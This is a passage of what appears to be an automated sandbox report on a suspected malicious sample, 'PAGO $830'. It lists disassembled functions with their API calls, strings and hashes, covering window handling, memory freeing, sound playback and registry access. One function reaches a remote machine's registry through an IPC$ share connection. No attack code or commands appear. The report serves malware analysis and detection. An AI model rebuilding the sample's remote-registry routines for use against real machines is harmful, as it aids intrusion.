                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                          • String ID: (
                                                          • API String ID: 2598888154-3887548279
                                                          • Opcode ID: bbe3c9debb52da3b66d629821f1cec48db1fd6e87bd5d97d3a98df01c6329f72
                                                          • Instruction ID: 42658c575e4f3a9bd90b8d404af24c223b90f541bf89f4cf6b61cfb29a557832
                                                          • Opcode Fuzzy Hash: bbe3c9debb52da3b66d629821f1cec48db1fd6e87bd5d97d3a98df01c6329f72
                                                          • Instruction Fuzzy Hash: 5261D275D00219EFCF04CFA8D884AAEBBB5FF48710F208529EA55B7250D775A951CF60
                                                          Function 00DAD9FD Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 00DADA41
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD5F9
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD60B
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD61D
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD62F
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD641
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD653
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD665
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD677
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD689
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD69B
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD6AD
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD6BF
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD6D1
                                                          • _free.LIBCMT ref: 00DADA36
                                                            • Part of subcall function 00DA2958: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000), ref: 00DA296E
                                                            • Part of subcall function 00DA2958: GetLastError.KERNEL32(00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000,00000000), ref: 00DA2980
                                                          • _free.LIBCMT ref: 00DADA58
                                                          • _free.LIBCMT ref: 00DADA6D
                                                          • _free.LIBCMT ref: 00DADA78
                                                          • _free.LIBCMT ref: 00DADA9A
                                                          • _free.LIBCMT ref: 00DADAAD
                                                          • _free.LIBCMT ref: 00DADABB
                                                          • _free.LIBCMT ref: 00DADAC6
                                                          • _free.LIBCMT ref: 00DADAFE
                                                          • _free.LIBCMT ref: 00DADB05
                                                          • _free.LIBCMT ref: 00DADB22
                                                          • _free.LIBCMT ref: 00DADB3A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: b687baa00bca3534f21921545c086e03b4d160e6ea691779af2b54142269b851
                                                          • Instruction ID: 612d186567331ec6a0586bbdb5701fc66429facc281aed20cd0cfc8a7d17b993
                                                          • Opcode Fuzzy Hash: b687baa00bca3534f21921545c086e03b4d160e6ea691779af2b54142269b851
                                                          • Instruction Fuzzy Hash: 7E317A726443069FEB20AA39D849B6B73EAFF22710F184429E45AD7561DF30ED85CB31
                                                          Function 00DD359E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 268windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00DD35DF
                                                          • _wcslen.LIBCMT ref: 00DD35EA
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00DD36DA
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00DD374F
                                                          • GetDlgCtrlID.USER32(?), ref: 00DD37A5
                                                          • GetWindowRect.USER32(?,?), ref: 00DD37CA
                                                          • GetParent.USER32(?), ref: 00DD37E8
                                                          • ScreenToClient.USER32(00000000), ref: 00DD37EF
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00DD3869
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00DD38A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                          • String ID: %s%u
                                                          • API String ID: 4010501982-679674701
                                                          • Opcode ID: ad8e1063e7f368f2bc143554bdfb3813089bbf3d06c1ee2914ba9bdbbaf42c52
                                                          • Instruction ID: 553a70e831d6607e5fc35eb6b8b4c666ab82e40610130bd79e609bd1a3970aac
                                                          • Opcode Fuzzy Hash: ad8e1063e7f368f2bc143554bdfb3813089bbf3d06c1ee2914ba9bdbbaf42c52
                                                          • Instruction Fuzzy Hash: ECA1C671204706AFD719DF64C844FAAF7A8FF44350F04862AF999D2250DB31EA49CBB2
                                                          Function 00DD489C Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 255COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00DD48DC
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00DD4922
                                                          • _wcslen.LIBCMT ref: 00DD4933
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00DD493F
                                                          • _wcsstr.LIBVCRUNTIME ref: 00DD4974
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00DD49AC
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00DD49E9
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00DD4A37
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00DD4A71
                                                          • GetWindowRect.USER32(?,?), ref: 00DD4AE1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                          • String ID: ThumbnailClass
                                                          • API String ID: 1311036022-1241985126
                                                          • Opcode ID: f5d2bb9c0e91e24f40595d131139371e5226cad7c4fa7563d71d962bee24d0f5
                                                          • Instruction ID: bebc85084b241bb6ebc420e4bb867dc4035bdf7a81cc2ca968ebfe6f05996d51
                                                          • Opcode Fuzzy Hash: f5d2bb9c0e91e24f40595d131139371e5226cad7c4fa7563d71d962bee24d0f5
                                                          • Instruction Fuzzy Hash: E491DC711043059FDB04CF15C884BAA7BA8FF84314F08952BFD899A296EB31ED49CBB1
                                                          Function 00E08C00 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E08C4C
                                                          • GetFocus.USER32 ref: 00E08C5C
                                                          • GetDlgCtrlID.USER32(00000000), ref: 00E08C67
                                                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00E08D0F
                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E08DC1
                                                          • GetMenuItemCount.USER32(?), ref: 00E08DDE
                                                          • GetMenuItemID.USER32(?,00000000), ref: 00E08DEE
                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E08E20
                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E08E62
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E08E93
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                          • String ID: 0
                                                          • API String ID: 1026556194-4108050209
                                                          • Opcode ID: b932eda35216b1ce2253ebfe30e493f949f188f5053fd96f1e46fc7edd627917
                                                          • Instruction ID: ccd33bccd838eb8f6537606c2b9acec24fbb644ed708fdf2eb97cee946cecaa5
                                                          • Opcode Fuzzy Hash: b932eda35216b1ce2253ebfe30e493f949f188f5053fd96f1e46fc7edd627917
                                                          • Instruction Fuzzy Hash: 9581BC70504301AFDB10CF15DE84AABBBE8FB98358F101A19F984A72D1DB71D985CBA2
                                                          Function 00DFCB5B Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DFCB8B
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00DFCBB4
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DFCC6F
                                                            • Part of subcall function 00DFCB5B: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00DFCBD1
                                                            • Part of subcall function 00DFCB5B: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00DFCBE4
                                                            • Part of subcall function 00DFCB5B: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DFCBF6
                                                            • Part of subcall function 00DFCB5B: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DFCC2C
                                                            • Part of subcall function 00DFCB5B: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DFCC4F
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DFCC1A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2734957052-4033151799
                                                          • Opcode ID: a3421c16b055c440398f1870932837b0cd9dde21e927a831fca9afe05c8912d2
                                                          • Instruction ID: b7b1cf58e4d645455c762a70d080cf7fdbceb434396ea269e8cdc0edff7d606f
                                                          • Opcode Fuzzy Hash: a3421c16b055c440398f1870932837b0cd9dde21e927a831fca9afe05c8912d2
                                                          • Instruction Fuzzy Hash: FB317C7190112CBFDB208B51DD88EFFBB7CEF45740F155165AA0AA2140DA309E89DAB0
                                                          Function 00DDE5CE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • timeGetTime.WINMM ref: 00DDE5D2
                                                            • Part of subcall function 00D8E465: timeGetTime.WINMM(?,?,00DDE5F2), ref: 00D8E469
                                                          • Sleep.KERNEL32(0000000A), ref: 00DDE5FF
                                                          • EnumThreadWindows.USER32(?,Function_0006E583,00000000), ref: 00DDE623
                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00DDE645
                                                          • SetActiveWindow.USER32 ref: 00DDE664
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DDE672
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00DDE691
                                                          • Sleep.KERNEL32(000000FA), ref: 00DDE69C
                                                          • IsWindow.USER32 ref: 00DDE6A8
                                                          • EndDialog.USER32(00000000), ref: 00DDE6B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: b443a096413cda57447a038b565a7b3ccff9a2cb975a158ac9138a46852e3bb4
                                                          • Instruction ID: ddf211ae6e0df8d144883b8f7c573f6f5c2c45fd508d8da290bdd2708b2f1b6c
                                                          • Opcode Fuzzy Hash: b443a096413cda57447a038b565a7b3ccff9a2cb975a158ac9138a46852e3bb4
                                                          • Instruction Fuzzy Hash: 2421A178200200AFEB116F32EC88B363B69F756744B55191AF901A53B1DB72FC899A35
                                                          Function 00DDE91A Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DDE97B
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DDE991
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DDE9A2
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DDE9B4
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DDE9C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: SendString$_wcslen
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 2420728520-1007645807
                                                          • Opcode ID: df7927fd00da714deb5fbe20ce40097fbaab5e4768cddf994806b0cc32039e07
                                                          • Instruction ID: 533f924459b99109f27b55bf8cd627217fe4c7487100c0c9e82562d282213de6
                                                          • Opcode Fuzzy Hash: df7927fd00da714deb5fbe20ce40097fbaab5e4768cddf994806b0cc32039e07
                                                          • Instruction Fuzzy Hash: 1A11CE31A8135879DB20B7B69C4AEFF6F7CEBD2B00F44442A7801B60D1EAB04904C9B0
                                                          Function 00D8A142 Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D8A4D7: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D8A15D,?,00000000,?,?,?,?,00D8A12F,00000000,?), ref: 00D8A53A
                                                          • DestroyWindow.USER32(?), ref: 00D8A1F6
                                                          • KillTimer.USER32(00000000,?,?,?,?,00D8A12F,00000000,?), ref: 00D8A290
                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00DC73C6
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00D8A12F,00000000,?), ref: 00DC73F4
                                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00D8A12F,00000000,?), ref: 00DC740B
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D8A12F,00000000), ref: 00DC7427
                                                          • DeleteObject.GDI32(00000000), ref: 00DC7439
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID:
                                                          • API String ID: 641708696-0
                                                          • Opcode ID: e401582842ea80cc540ea01d79cd12b6c090297408cb09b32b2b3ef9294b9ded
                                                          • Instruction ID: 38e621440d50f71e61e41bbecde59711297014e0e98e1d2d9648c76ddde564da
                                                          • Opcode Fuzzy Hash: e401582842ea80cc540ea01d79cd12b6c090297408cb09b32b2b3ef9294b9ded
                                                          • Instruction Fuzzy Hash: 8961BD34504701DFEB35AF1AD948B297BB1FB41312F28155EE082A79A0C372B9D5DFA2
                                                          Function 00D8ACB8 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D8ADC4: GetWindowLongW.USER32(?,000000EB), ref: 00D8ADD2
                                                          • GetSysColor.USER32(0000000F), ref: 00D8ACE2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: 37186dd7e7781bfe584f43aaa0794cf97546e7344a5e81d5b5b7b24173338e9e
                                                          • Instruction ID: 106035e52ca55d3eaf9c94bbc5b7f2c4530b6a61da5b44fafd75ab319083f4f1
                                                          • Opcode Fuzzy Hash: 37186dd7e7781bfe584f43aaa0794cf97546e7344a5e81d5b5b7b24173338e9e
                                                          • Instruction Fuzzy Hash: 2541D331105641AFEB206B3DDC48FB93765EB06362F28460AF9A6DB1E1D7319C82DB31
                                                          Function 00DD9600 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DC03D3,?,0000138C,?,?,?,?,00000000,?), ref: 00DD9635
                                                          • LoadStringW.USER32(00000000,?,00DC03D3,?), ref: 00DD963E
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,00DC03D3,?,0000138C,?,?,?,?,00000000,?,?), ref: 00DD9660
                                                          • LoadStringW.USER32(00000000,?,00DC03D3,?), ref: 00DD9663
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DD9784
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wcslen
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 747408836-2268648507
                                                          • Opcode ID: c4dd0a4926c30b5bf55a15bcd66cce5c5b1b5fd0b66070149b66f064a0537633
                                                          • Instruction ID: 4df369a1ced067437dd46bcb9b566d1845de7c528c2be8798bbfd9fa7381b131
                                                          • Opcode Fuzzy Hash: c4dd0a4926c30b5bf55a15bcd66cce5c5b1b5fd0b66070149b66f064a0537633
                                                          • Instruction Fuzzy Hash: 5E413972801209AACF04FFE0DD96EEEB778EF15310F504066B60A72192EA756E49CB71
                                                          Function 00DD05C7 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00DD068B
                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00DD06A7
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00DD06C3
                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00DD06ED
                                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00DD0715
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DD0720
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DD0725
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                          • API String ID: 323675364-22481851
                                                          • Opcode ID: 9f5cd90ddf9cedd19828c0f62405af685196e2188e18aa4584ed6bd31dfd4770
                                                          • Instruction ID: f214bb34c3269284fff03a98a6f04b366e0a2a21d9c676421d00d4e4ba00500c
                                                          • Opcode Fuzzy Hash: 9f5cd90ddf9cedd19828c0f62405af685196e2188e18aa4584ed6bd31dfd4770
                                                          • Instruction Fuzzy Hash: 8541E772810229AFCB11ABA4DC559EDBB78FF54350F44812AE919B6261EB709E04CA70
                                                          Function 00DF3B57 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00DF3B83
                                                          • CoInitialize.OLE32(00000000), ref: 00DF3BB1
                                                          • CoUninitialize.OLE32 ref: 00DF3BBB
                                                          • _wcslen.LIBCMT ref: 00DF3C54
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00DF3CD8
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00DF3DFC
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00DF3E35
                                                          • CoGetObject.OLE32(?,00000000,00E0FBB4,?), ref: 00DF3E54
                                                          • SetErrorMode.KERNEL32(00000000), ref: 00DF3E67
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DF3EEB
                                                          • VariantClear.OLEAUT32(?), ref: 00DF3EFF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
